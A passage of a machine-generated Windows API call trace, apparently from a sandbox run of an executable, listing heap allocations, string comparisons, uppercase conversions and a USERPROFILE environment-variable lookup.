dwCmpFlags=0x1, lpString1="zilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0138.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0138.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0138.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0138.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0138.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0138.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0138.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0138.433] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0138.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0138.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0138.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0138.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0138.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mozilla", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0138.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozilla", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0138.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0138.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0138.434] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0138.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0138.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0138.434] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0138.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0138.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0138.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0138.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0138.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0138.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0138.435] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0138.435] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0138.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0138.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0138.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0138.436] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0138.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0138.437] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0138.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0138.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0138.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0138.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0138.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0138.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0138.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0138.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0138.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0138.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0138.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0138.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0138.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0138.439] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0138.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0138.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0138.439] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0138.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0138.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0138.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0138.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0138.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0138.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0138.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0138.440] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0138.440] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0138.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0138.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0138.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0138.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0138.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0138.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0138.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0138.441] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0138.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0138.441] RtlAllocateHeap 